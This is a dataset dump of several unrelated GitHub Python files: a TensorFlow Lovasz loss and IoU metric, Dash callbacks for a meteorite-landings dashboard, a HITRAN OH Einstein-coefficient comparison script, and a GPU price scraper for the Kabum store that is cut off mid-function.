https://github.com/bermanmaxim/LovaszSoftmax\r\ndef lovasz_grad(gt_sorted):\r\n \"\"\"\r\n Computes gradient of the Lovasz extension w.r.t sorted errors\r\n See Alg. 1 in paper\r\n \"\"\"\r\n gts = tf.reduce_sum(gt_sorted)\r\n intersection = gts - tf.cumsum(gt_sorted)\r\n union = gts + tf.cumsum(1. - gt_sorted)\r\n jaccard = 1. - intersection / union\r\n jaccard = tf.concat((jaccard[0:1], jaccard[1:] - jaccard[:-1]), 0)\r\n return jaccard\r\n\r\n\r\n# --------------------------- BINARY LOSSES ---------------------------\r\n# code download from: https://github.com/bermanmaxim/LovaszSoftmax\r\ndef lovasz_hinge(logits, labels, per_image=True, ignore=None):\r\n \"\"\"\r\n Binary Lovasz hinge loss\r\n logits: [B, H, W] Variable, logits at each pixel (between -\\infty and +\\infty)\r\n labels: [B, H, W] Tensor, binary ground truth masks (0 or 1)\r\n per_image: compute the loss per image instead of per batch\r\n ignore: void class id\r\n \"\"\"\r\n if per_image:\r\n def treat_image(log_lab):\r\n log, lab = log_lab\r\n log, lab = tf.expand_dims(log, 0), tf.expand_dims(lab, 0)\r\n log, lab = flatten_binary_scores(log, lab, ignore)\r\n return lovasz_hinge_flat(log, lab)\r\n losses = tf.map_fn(treat_image, (logits, labels), dtype=tf.float32)\r\n loss = tf.reduce_mean(losses)\r\n else:\r\n loss = lovasz_hinge_flat(*flatten_binary_scores(logits, labels, ignore))\r\n return loss\r\n\r\n# code download from: https://github.com/bermanmaxim/LovaszSoftmax\r\ndef lovasz_hinge_flat(logits, labels):\r\n \"\"\"\r\n Binary Lovasz hinge loss\r\n logits: [P] Variable, logits at each prediction (between -\\infty and +\\infty)\r\n labels: [P] Tensor, binary ground truth labels (0 or 1)\r\n ignore: label to ignore\r\n \"\"\"\r\n\r\n def compute_loss():\r\n labelsf = tf.cast(labels, logits.dtype)\r\n signs = 2. * labelsf - 1.\r\n errors = 1. - logits * tf.stop_gradient(signs)\r\n errors_sorted, perm = tf.nn.top_k(errors, k=tf.shape(errors)[0], name=\"descending_sort\")\r\n gt_sorted = tf.gather(labelsf, perm)\r\n grad = lovasz_grad(gt_sorted)\r\n loss = tf.tensordot(tf.nn.relu(errors_sorted), tf.stop_gradient(grad), 1, name=\"loss_non_void\")\r\n return loss\r\n\r\n # deal with the void prediction case (only void pixels)\r\n loss = tf.cond(tf.equal(tf.shape(logits)[0], 0),\r\n lambda: tf.reduce_sum(logits) * 0.,\r\n compute_loss,\r\n strict=True,\r\n name=\"loss\"\r\n )\r\n return loss\r\n\r\n# code download from: https://github.com/bermanmaxim/LovaszSoftmax\r\ndef flatten_binary_scores(scores, labels, ignore=None):\r\n \"\"\"\r\n Flattens predictions in the batch (binary case)\r\n Remove labels equal to 'ignore'\r\n \"\"\"\r\n scores = tf.reshape(scores, (-1,))\r\n labels = tf.reshape(labels, (-1,))\r\n if ignore is None:\r\n return scores, labels\r\n valid = tf.not_equal(labels, ignore)\r\n vscores = tf.boolean_mask(scores, valid, name='valid_scores')\r\n vlabels = tf.boolean_mask(labels, valid, name='valid_labels')\r\n return vscores, vlabels\r\n\r\n# code download from: https://github.com/bermanmaxim/LovaszSoftmax\r\ndef lovasz_loss(y_true, y_pred):\r\n y_true, y_pred = K.cast(K.squeeze(y_true, -1), 'int32'), K.cast(K.squeeze(y_pred, -1), 'float32')\r\n logits = y_pred #Jiaxin\r\n loss = lovasz_hinge(logits, y_true, per_image = True, ignore = None)\r\n return loss\r\n\r\n# src: https://www.kaggle.com/aglotero/another-iou-metric\r\ndef iou_metric(y_true_in, y_pred_in, print_table=False):\r\n labels = y_true_in\r\n y_pred = y_pred_in\r\n\r\n\r\n true_objects = 2\r\n pred_objects = 2\r\n\r\n # if all zeros, original code generate wrong bins [-0.5 0 0.5],\r\n temp1 = np.histogram2d(labels.flatten(), y_pred.flatten(), bins=([0,0.5,1], [0,0.5, 1]))\r\n\r\n intersection = temp1[0]\r\n\r\n # Compute areas (needed for finding the union between all objects)\r\n area_true = np.histogram(labels,bins=[0,0.5,1])[0]\r\n area_pred = np.histogram(y_pred, bins=[0,0.5,1])[0]\r\n area_true = np.expand_dims(area_true, -1)\r\n area_pred = np.expand_dims(area_pred, 0)\r\n\r\n # Compute union\r\n union = area_true + area_pred - intersection\r\n \r\n # Exclude background from the analysis\r\n intersection = intersection[1:,1:]\r\n intersection[intersection == 0] = 1e-9\r\n \r\n union = union[1:,1:]\r\n union[union == 0] = 1e-9\r\n\r\n # Compute the intersection over union\r\n iou = intersection / union\r\n\r\n # Precision helper function\r\n def precision_at(threshold, iou):\r\n matches = iou > threshold\r\n true_positives = np.sum(matches, axis=1) == 1 # Correct objects\r\n false_positives = np.sum(matches, axis=0) == 0 # Missed objects\r\n false_negatives = np.sum(matches, axis=1) == 0 # Extra objects\r\n tp, fp, fn = np.sum(true_positives), np.sum(false_positives), np.sum(false_negatives)\r\n return tp, fp, fn\r\n\r\n # Loop over IoU thresholds\r\n prec = []\r\n if print_table:\r\n print(\"Thresh\\tTP\\tFP\\tFN\\tPrec.\")\r\n for t in np.arange(0.5, 1.0, 0.05):\r\n tp, fp, fn = precision_at(t, iou)\r\n if (tp + fp + fn) > 0:\r\n p = tp / (tp + fp + fn)\r\n else:\r\n p = 0\r\n if print_table:\r\n print(\"{:1.3f}\\t{}\\t{}\\t{}\\t{:1.3f}\".format(t, tp, fp, fn, p))\r\n prec.append(p)\r\n \r\n if print_table:\r\n print(\"AP\\t-\\t-\\t-\\t{:1.3f}\".format(np.mean(prec)))\r\n return np.mean(prec)\r\n\r\n# src: https://www.kaggle.com/aglotero/another-iou-metric\r\ndef iou_metric_batch(y_true_in, y_pred_in):\r\n batch_size = y_true_in.shape[0]\r\n metric = []\r\n for batch in range(batch_size):\r\n value = iou_metric(y_true_in[batch], y_pred_in[batch])\r\n metric.append(value)\r\n return np.mean(metric)","repo_name":"interruping/ternausnet_tensorflow","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":6830,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"27071992398","text":"from pathlib import Path\nimport numpy as np\nimport pandas as pd\nfrom dash.dependencies import Input, Output, State\nfrom dash._callback_context import callback_context as ctx\nimport plotly.graph_objects as go\nimport plotly.express as px\nfrom dash import dcc\n\n# MapBox access token\nmapbox_access_token = 'pk.eyJ1Ijoic2VyZW5haXZlcyIsImEiOiJjbDEzeDcxemUwNTN0M2Jxem9hbmVtb3RyIn0.K_CZ4pFHTGuZ2mOrCRC89Q'\n\n# all meteorite categories in the original dataset\ncategory_arr = ['stony', 'iron', 'stony iron', 'unclassified']\n\n# array used to keep track of selected meteorite categories\nvisible_arr = category_arr.copy()\n\n# dictionary used to map meteorite categories to map marker colors\ndiscrete_color_map = {'stony': '#3B8FA2',\n 'iron': '#CD4117',\n 'stony iron': '#F3CA4C',\n 'unclassified': '#888888'}\n\n# array used to map meteorite categories to bar and pie chart colors\ncolors = ['#3B8FA2', '#CD4117', '#F3CA4C', '#888888']\n\n# dictionary used to map year and mass graphs to colors corresponding to found/ fell categorisation\ntwo_color_palette = {\n 'Found': '#466930',\n 'Fell': '#48BF52'\n}\n\n# generic layout for dcc.Graph objects\nlayout = dict(\n plot_bgcolor='#FFFFFF',\n paper_bgcolor='#FFFFFF',\n xaxis=dict(color='black', showgrid=False),\n yaxis=dict(color='black', showgrid=False),\n title_font_family='Courier New',\n font_family='Courier New',\n title_font_color='black',\n font_color='black'\n)\n\n# Import data\n# ---------------------------------------------------------------------------------\nfp = Path(__file__).parent.parent.parent.joinpath('meteorite_landings_cleaned.csv')\ndf = pd.read_csv(fp)\n\n# Define functions used in data filtering\n# ---------------------------------------------------------------------------------\n\n\ndef get_filtered_df(years_selected, discovery, mass_selected):\n \"\"\"filters global DataFrame df by year, discovery type (found/ fell) and mass\n Args:\n years_selected: tuple [start year, end year]\n discovery: array of strings, one of [\"Found\"], [\"Fell\"], [\"Found\", \"Fell\"], [\"Fell\", \"Found\"] or []\n mass_selected: tuple [minimum mass, maximum mass]\n Returns:\n filtered_df: global df filtered by parameter values\n \"\"\"\n # filter by year selection\n filtered_df = df[(df['year'] >= years_selected[0]) & (df['year'] <= years_selected[1])]\n\n # filter by discovery (found/ fell) selection\n filtered_df = filtered_df[filtered_df['fall'].isin(discovery)]\n\n # filter by mass selection\n filtered_df = filtered_df[\n (filtered_df['mass (g)'] >= mass_selected[0]) & (filtered_df['mass (g)'] <= mass_selected[1])]\n return filtered_df\n\n\ndef geo_filter(dff, selected_data):\n \"\"\"filters a DataFrame to match selection of points on geographical scatter map\n Args:\n dff: df with current filters applied\n selected_data: dictionary containing points on geographical scatter map selected via UI\n input, each point is a dictionary:\n {'points': {curveNumber, pointNumber, pointIndex, lon, lat, customdata, text}}\n Returns:\n dff: dff filtered to include only rows with id values corresponding\n to those specified by selected_data\n \"\"\"\n if selected_data is not None:\n row_ids = []\n for point in selected_data['points']:\n # customdata stores the id for each point in selected_data\n row_ids.append(point['customdata'])\n # match ids of selected_data to ids in meteorite dataset and filter accordingly\n dff = dff[dff['id'].isin(row_ids)]\n return dff\n\n\ndef get_by_category_count(filtered_df):\n \"\"\"calculates count of each unique value in 'category' column of a DataFrame\n Args:\n filtered_df: df with current filters applied\n Returns:\n df_count: DataFrame with columns 'category' and 'count'\n \"\"\"\n df_count = pd.DataFrame(filtered_df['category'].value_counts().reset_index().values, columns=['category', 'count'])\n df_count = df_count.sort_index(axis=0, ascending=True)\n return df_count\n\n\ndef get_by_year_count(filtered_df):\n \"\"\"groups a DataFrame by 'year' and 'fall' columns and calculates count of each group\n Args:\n filtered_df: df with current filters applied\n Returns:\n df_count: DataFrame with columns 'year', 'fall' and 'count'\n \"\"\"\n df_count = filtered_df.groupby(['year', 'fall'])['name'].count().unstack(fill_value=0).stack().reset_index()\n df_count.columns = ['year', 'fall', 'count']\n df_count.sort_values(by='year', inplace=True)\n return df_count\n\n\n# Define functions used to create plotly graph figures in visualise-by column\n# --------------------------------------------------------------------------------\n\n\n# category graph (bar graph or pie chart depending on argument category_graph_type)\n# ---------------------------------------------------------------------------------\ndef get_category_graph(filtered_df, category_graph_type):\n # get meteorite count by category\n df_category_count = get_by_category_count(filtered_df)\n\n # bar graph\n if category_graph_type == 'Bar':\n fig = px.bar(\n data_frame=df_category_count,\n x='category',\n y='count',\n orientation='v',\n color='category',\n color_discrete_sequence=colors,\n )\n\n fig.update_layout(\n xaxis_title='Meteorite Category',\n yaxis_title='Number of Meteorite Landings')\n\n # pie chart\n elif category_graph_type == 'Pie':\n fig = px.pie(\n data_frame=df_category_count,\n names='category',\n values='count',\n color='category',\n color_discrete_sequence=colors\n )\n\n fig.update_traces(\n textinfo='percent+label',\n marker_line=dict(color='black', width=1)\n )\n\n # update fig with generic graph layout and shared legend title\n fig.update_layout(\n layout,\n legend_title='Category'\n )\n return fig\n\n\n# year graph (line graph with separate traces corresponding to found/ fell categorisation)\n# ----------------------------------------------------------------------------------------\ndef get_year_graph(filtered_df, discovery):\n # get meteorite count by year\n df_year_count = get_by_year_count(filtered_df)\n\n trace = []\n\n # if found and fell are both selected\n if 'Found' in discovery and 'Fell' in discovery:\n # add a trace with data corresponding to ALL meteorite landings\n trace.append(\n dict(\n name='All',\n type='scatter',\n mode='lines',\n x=df_year_count['year'],\n y=df_year_count['count'],\n visible='legendonly'\n )\n )\n\n # add separate traces corresponding to each selected mode of discovery (found and/or fell)\n for i in discovery:\n trace.append(\n dict(\n name=i,\n type='scatter',\n mode='lines',\n x=df_year_count[df_year_count['fall'] == i]['year'],\n y=df_year_count[df_year_count['fall'] == i]['count'],\n marker=dict(\n color=two_color_palette[i]\n )\n )\n )\n\n # initialise figure with generic layout\n fig = go.Figure(data=trace, layout=layout)\n # update layout with features specific to year graph\n fig.update_layout(\n hovermode='x unified',\n yaxis_title='Number of Meteorite Landings',\n xaxis_title='Year',\n )\n fig.update_yaxes(rangemode='tozero')\n\n return fig\n\n\n# mass graph (histogram or box & whisker plot depending on argument mass_graph_type)\n# ----------------------------------------------------------------------------------------\ndef get_mass_graph(filtered_df, mass_graph_type, discovery, log_scale):\n # set scale and x-axis title according to parameter log_scale\n if log_scale == 'on':\n filtered_df['log mass (g)'] = np.log(filtered_df['mass (g)'])\n x_col = 'log mass (g)'\n xaxis_title = 'log mass (g)'\n else:\n x_col = 'mass (g)'\n xaxis_title = 'Mass (g)'\n\n # initialise figure with generic layout\n fig = go.Figure(layout=layout)\n\n # histogram\n if mass_graph_type == 'Histogram':\n # if found and fell are both selected\n if 'Found' in discovery and 'Fell' in discovery:\n fig.add_trace(\n go.Histogram(\n name='All',\n x=filtered_df[x_col],\n visible='legendonly'\n ),\n )\n\n # add separate traces corresponding to each selected mode of discovery (found and/or fell)\n for i in discovery:\n fig.add_trace(\n go.Histogram(\n name=i,\n x=filtered_df[filtered_df['fall'] == i][x_col],\n marker=dict(\n color=two_color_palette[i]\n )\n ),\n )\n\n # update layout with features specific to histogram\n fig.update_layout(\n layout,\n barmode='overlay',\n hovermode='x unified',\n xaxis_title=xaxis_title,\n yaxis_title='Number of Meteorite Landings'\n )\n\n fig.update_traces(opacity=0.75)\n\n # box & whisker plot\n elif mass_graph_type == 'Box':\n # if found and fell are both selected\n if 'Found' in discovery and 'Fell' in discovery:\n # add a trace with data corresponding to ALL meteorite landings\n fig.add_trace(\n go.Box(\n name='All',\n x=filtered_df[x_col],\n orientation='h',\n visible='legendonly'\n ),\n )\n\n # add separate traces corresponding to each selected mode of discovery (found and/or fell)\n for i in discovery:\n fig.add_trace(\n go.Box(\n name=i,\n x=filtered_df[filtered_df['fall'] == i][x_col],\n orientation='h',\n marker=dict(\n color=two_color_palette[i]\n )\n ),\n )\n\n # update layout with features specific to box & whisker plot\n fig.update_layout(\n xaxis_title=xaxis_title)\n\n return fig\n\n\ndef register_callbacks(dashapp):\n # geographical scatter map\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n [Output('map-plot', 'figure'),\n Output('map-plot', 'selectedData')],\n [Input('year-slider', 'value'),\n Input('found-fell-selection', 'value'),\n Input('color-coordinate', 'value'),\n Input('refresh-button', 'n_clicks'),\n Input('mass-slider', 'value'),\n Input('size-coordinate', 'value'),\n Input('category-graph', 'restyleData'),\n Input('map-plot', 'selectedData'),\n State('map-plot', 'figure')]\n )\n def update_map(years_selected, discovery, color_coord, n_clicks, mass_selected, size, cat_selected, selected_data,\n current_fig):\n filtered_df = get_filtered_df(years_selected, discovery, mass_selected)\n text = filtered_df.name\n trace = []\n selectedData = None\n\n # if anything other than input from the <> button triggered the callback\n if ctx.triggered[0]['prop_id'].split('.')[0] != 'refresh-button':\n # filter by current selection of points on map\n filtered_df = geo_filter(filtered_df, selected_data)\n # keep the same selection of points as before\n selectedData = selected_data\n\n # share data stored in visible_arr between callbacks\n global visible_arr\n\n # if the callback was triggered by trace selection/ deselection on category graph\n if ctx.triggered[0]['prop_id'].split('.')[0] == 'category-graph':\n\n # then filter data visible on map according to currently selected categories on category graph\n if cat_selected is not None:\n\n # if the callback was triggered by trace deselection\n if cat_selected[0]['visible'][0] == 'legendonly':\n # match index to category_arr and remove deselected category from visible_arr\n visible_arr.remove(category_arr[cat_selected[1][0]])\n\n # if the callback was triggered by selection of a new trace\n elif cat_selected[0]['visible'][0]:\n # match index to category_arr and add newly selected category to visible_arr\n visible_arr.append(category_arr[cat_selected[1][0]])\n\n # if callback was not triggered by trace selection/ deselection\n # then it would instead be triggered by switching between bar and pie charts\n else:\n # except for first call, when no fig has been initialised yet\n if current_fig is not None:\n # map display remains unchanged\n return [current_fig, selected_data]\n\n # if user has selected option to coordinate map markers to category\n if color_coord == 'on':\n # loop through all possible categories in original (unfiltered) dataset\n for i in category_arr:\n # if category is currently selected via category graph\n if i in visible_arr:\n # add corresponding data to map trace\n trace.append(\n dict(\n name=i,\n type='scattermapbox',\n # each trace handles only the data corresponding to current category\n lat=filtered_df[filtered_df['category'] == i]['reclat'],\n lon=filtered_df[filtered_df['category'] == i]['reclong'],\n text=text,\n hoverinfo='text',\n mode='markers',\n marker=dict(\n # match category to corresponding color\n color=discrete_color_map[i],\n # set marker size proportional to mass\n size=2 * (np.log(filtered_df[filtered_df['category'] == i]['mass (g)'])),\n opacity=0.6),\n # store row id of each data point\n customdata=filtered_df[filtered_df['category'] == i]['id']\n )\n )\n else:\n # display all data in filtered df with a constant color\n trace.append(\n dict(\n type='scattermapbox',\n lat=filtered_df.reclat,\n lon=filtered_df.reclong,\n hovertemplate=None,\n text=text,\n hoverinfo='text',\n mode='markers',\n marker=dict(\n color='#F3959A',\n # set marker size proportional to mass\n size=2 * (np.log(filtered_df['mass (g)'])),\n opacity=0.6),\n # store row id of each data point\n customdata=filtered_df.id\n )\n )\n\n # set map-specific layout\n map_layout = dict(\n hovermode='closest',\n margin=dict(r=0, l=0, t=0, b=0),\n color=filtered_df.category,\n showlegend=False,\n mapbox=dict(\n accesstoken=mapbox_access_token,\n bearing=0,\n center=dict(\n lat=0,\n lon=0,\n ),\n zoom=0.7,\n style='carto-positron',\n ),\n )\n fig = dict(data=trace, layout=map_layout)\n\n # if user has not selected to coordinate size to mass\n if size == 'off':\n # set constant marker size\n for i in fig['data']:\n i['marker']['size'] = 9\n\n return [fig, selectedData]\n\n # interactive table\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n Output('interactive-table', 'data'),\n [Input('map-plot', 'selectedData'),\n Input('year-slider', 'value'),\n Input('found-fell-selection', 'value'),\n Input('refresh-button', 'n_clicks'),\n Input('mass-slider', 'value')]\n )\n def update_table(selected_data, years_selected, discovery, n_clicks, mass_selected):\n # if callback was triggered by refresh button clear table\n if ctx.triggered[0]['prop_id'].split('.')[0] == 'refresh-button':\n return None\n\n # if nothing is selected on the map table is empty\n elif selected_data is None:\n return None\n\n # else populate table according to the selected data\n else:\n filtered_df = get_filtered_df(years_selected, discovery, mass_selected)\n dff = geo_filter(filtered_df, selected_data)\n dff = dff.filter(items=['name', 'fall', 'category', 'year', 'mass (g)'])\n return dff.to_dict('records')\n\n # category tab\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n Output('category-tab-content', 'children'),\n [Input('year-slider', 'value'),\n Input('category-graph-type', 'value'),\n Input('found-fell-selection', 'value'),\n Input('map-plot', 'selectedData'),\n Input('refresh-button', 'n_clicks'),\n Input('mass-slider', 'value')]\n )\n def update_category_tab(years_selected, category_graph_type, discovery, selected_data, n_clicks, mass_selected):\n filtered_df = get_filtered_df(years_selected, discovery, mass_selected)\n\n # if anything other than input from the <> button triggered the callback\n if ctx.triggered[0]['prop_id'].split('.')[0] != 'refresh-button':\n # filter by current selection via UI of points on map\n filtered_df = geo_filter(filtered_df, selected_data)\n\n fig = get_category_graph(filtered_df, category_graph_type)\n content = dcc.Graph(id='category-graph', figure=fig)\n return [content]\n\n # year tab\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n Output('year-tab-content', 'children'),\n [Input('year-slider', 'value'),\n Input('found-fell-selection', 'value'),\n Input('map-plot', 'selectedData'),\n Input('refresh-button', 'n_clicks'),\n Input('mass-slider', 'value')]\n )\n def update_year_tab(years_selected, discovery, selected_data, n_clicks, mass_selected):\n filtered_df = get_filtered_df(years_selected, discovery, mass_selected)\n\n # if anything other than input from the <> button triggered the callback\n if ctx.triggered[0]['prop_id'].split('.')[0] != 'refresh-button':\n # filter by current selection of points on map\n filtered_df = geo_filter(filtered_df, selected_data)\n\n fig = get_year_graph(filtered_df, discovery)\n content = dcc.Graph(id='year-graph', figure=fig)\n return [content]\n\n # mass tab\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n Output('mass-tab-content', 'children'),\n [Input('year-slider', 'value'),\n Input('found-fell-selection', 'value'),\n Input('mass-graph-type', 'value'),\n Input('map-plot', 'selectedData'),\n Input('refresh-button', 'n_clicks'),\n Input('mass-slider', 'value'),\n Input('log-scale', 'value')]\n )\n def update_mass_tab(years_selected, discovery, mass_graph_type, selected_data, n_clicks, mass_selected, log_scale):\n filtered_df = get_filtered_df(years_selected, discovery, mass_selected)\n\n # if anything other than input from the <> button triggered the callback\n if ctx.triggered[0]['prop_id'].split('.')[0] != 'refresh-button':\n # filter by current selection of points on map\n filtered_df = geo_filter(filtered_df, selected_data)\n\n fig = get_mass_graph(filtered_df, mass_graph_type, discovery, log_scale)\n content = dcc.Graph(id='mass-graph', figure=fig)\n return content\n\n # category tab control box\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n Output('category-control-box', 'style'),\n [Input('visualise-by-tabs', 'active_tab')]\n )\n def display_category_control_box(active_tab):\n # display category tab control box if category tab is currently active\n if active_tab == 'category-tab':\n style = {'display': 'block'}\n # else keep hidden\n else:\n style = {'display': 'none'}\n return style\n\n # mass tab control box\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n Output('mass-control-box', 'style'),\n [Input('visualise-by-tabs', 'active_tab')]\n )\n def display_mass_control_box(active_tab):\n # display mass tab control box if mass tab is currently active\n if active_tab == 'mass-tab':\n style = {'display': 'block'}\n # else keep hidden\n else:\n style = {'display': 'none'}\n return style\n","repo_name":"serenaives/visualising_meteorite_landings","sub_path":"part_2/dashboard/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":21884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70491476402","text":"from __future__ import print_function\n\nimport matplotlib.pyplot as plt\n\nwith open('downloaded_data/oh_rot.dat') as inputfile:\n lines = inputfile.readlines()\n\nfreqs_hitran = []\necoeffs_hitran = []\njlower_hitran = []\njhigher_hitran = []\n\nfor line in lines:\n if len(line) > 1:\n\n data = line.split()\n \n if 'v=0' not in data[3] and 'v=0' not in data[4]:\n continue\n\n lj = float(data[3].split('J=')[1].split(';')[0])\n hj = float(data[4].split('J=')[1].split(';')[0])\n\n if lj >= hj or lj > 20 or hj > 20:\n continue\n\n freqs_hitran.append(float(data[1]))\n ecoeffs_hitran.append(float(data[2]))\n \n jlower_hitran.append(lj)\n jhigher_hitran.append(hj)\n\nfor f, lj, hj, a in zip(freqs_hitran, jlower_hitran, jhigher_hitran, ecoeffs_hitran):\n print('freq: {0}; lower j: {1}; higher j: {2}; einst: {3}'.format(f, lj, hj, a))\n\nprint('*'*30)\n\nwith open('../data/my_potential/energy.dat') as inputfile:\n lines = inputfile.readlines()\n\nlevels_calc = []\nj_values = []\n\nfor line in lines:\n if len(line) > 1:\n data = line.split()\n \n if data[0].isdigit():\n if int(data[0]) == 0:\n levels_calc.append(float(data[1]))\n \n if 'J =' in line:\n j_values.append(float(data[-1]))\n\n\nfreq_calc = []\njlower_calc = []\njhigher_calc = []\necoeffs_calc = []\n\nfor l1, l2, j1, j2 in zip(levels_calc, levels_calc[1:], j_values, j_values[1:]):\n f = l2 - l1\n \n freq_calc.append(f)\n jlower_calc.append(j1)\n jhigher_calc.append(j2)\n\n s = (j1) / (2 * j1 + 1.)\n \n ecoeffs_calc.append(3.137 * 10**(-7) * f**3 * s)\n\nfor f, lj, hj, e in zip(freq_calc, jlower_calc, jhigher_calc, ecoeffs_calc):\n print('freq: {0}; lower j: {1}; higher j: {2}; einst: {3}'.format(f, lj, hj, e))\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"artfin/qc-workshop","sub_path":"hitran_api/oh_einst_coeff.py","file_name":"oh_einst_coeff.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14476941647","text":"import json, re\nfrom requests_html import HTMLSession\n\ndisponibilidade = 0\nnotificacao = 1\n\ndef check3090(data):\n\tcode = ['3','0','9','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice3090(data):\n\treturn (data['preco_desconto'] < 14000)\n\ndef check3080(data):\n\tcode = ['3','0','8','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice3080(data):\n\treturn (data['preco_desconto'] < 11000)\n\ndef check3070(data):\n\tcode = ['3','0','7','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice3070(data):\n\treturn (data['preco_desconto'] < 7000)\n\ndef check3060Ti(data):\n\tcode = ['3','0','6','0','T','I','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice3060Ti(data):\n\treturn (data['preco_desconto'] < 7000)\n\ndef check2060(data):\n\tcode = ['2','0','6','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice2060(data):\n\treturn (data['preco_desconto'] < 2800)\n\ndef check1660Super(data):\n\tcode = ['1','6','6','0','S','U','P','E','R','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice1660Super(data):\n\treturn (data['preco_desconto'] < 2200)\n\ndef check5700(data):\n\tcode = ['5','7','0','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice5700(data):\n\treturn (data['preco_desconto'] < 5500)\n\ndef check5600(data):\n\tcode = ['5','6','0','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice5600(data):\n\treturn (data['preco_desconto'] < 4500)\n\ndef check5500(data):\n\tcode = ['5','5','0','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice5500(data):\n\treturn (data['preco_desconto'] < 2800)\n\n\n\ndef checkAvailable(data):\n\treturn data['disponibilidade']\n\ndef requestKabumVGAPages():\n\tdados = []\n\ttries = 0\n\tpage = 1\n\twhile (page <= 5):\n\n\t\tstatusCode = 0\n\t\tkaBumWebPage = f'https://www.kabum.com.br/hardware/placa-de-video-vga?pagina={page}&ordem=4&limite=100&prime=false&marcas=[]&tipo_produto=[]&filtro=[]'\n\t\tsession = HTMLSession()\n\n\t\ttry:\n\n\t\t\tresponse = session.get(url=kaBumWebPage, timeout=2)\n\n\t\texcept Exception as e:\n\n\t\t\tprint(e)\n\t\t\ttries += 1\n\t\t\tif (tries == 3):\n\t\t\t\tprint('next page.')\n\t\t\t\tpage += 1\n\t\t\t\ttries = 0\n\n\t\telse:\n\n\t\t\tstatusCode = response.status_code\n# print(f'Status: {statusCode}')\n\t\t\tprint(f'Page: {page}')\n\n\t\t\tif statusCode == 200:\n\n\t\t\t\t# zera número de tentativas\n\t\t\t\ttries = 0\n\t\t\t\t# avança para a próxima página\n\t\t\t\tpage += 1\n\n\t\t\t\t# procura pelo script referente aos produtos na página\n\t\t\t\tscript = response.html.find('script')[21]\n\t\t\t\t#parse variável listagemDados\n\t\t\t\tinitIndex = script.text.find('const listagemDados')+6\n\t\t\t\tendIndex = script.text.find('const listagemErro')-1\n\t\t\t\tvar = script.text[initIndex:endIndex]\n\t\t\t\t#define regex match pattern\n\t\t\t\tmatch_scripts = re.findall(r'(.*) (=) ([^;].*)', var)\n\t\t\t\t# transforma str em JSON\n\t\t\t\tdado = json.loads(match_scripts[0][2])\n\n\t\t\t\t# caso haja uma listagem dos produtos na página\n\t\t\t\tif any(dado):\n\t\t\t\t\tdados.append(dado)\n# print(f'{len(dado)} itens nesta página.')\n\t\t\t\telse:\n\t\t\t\t\t# print('Nenhum item nesta página.')\n\t\t\t\t\tbreak\n\treturn dados\n\ndef createDb():\n\t\n\t# requisita página web\n\tdados = requestKabumVGAPages()\n\titensKabum = {}\n\tnotificado = False\n\t\n\tfor page in dados:\n\t\tfor dado in page:\n\t\t\titensKabum[dado['codigo']] = [dado['disponibilidade'], notificado]\n# itensKabum.append({dado['codigo']: [dado['disponibilidade'], False]})\n\t\n\treturn [itensKabum, dados]\n\ndef checkAMD(data, cont, itensKabum):\n\n\talertSent = 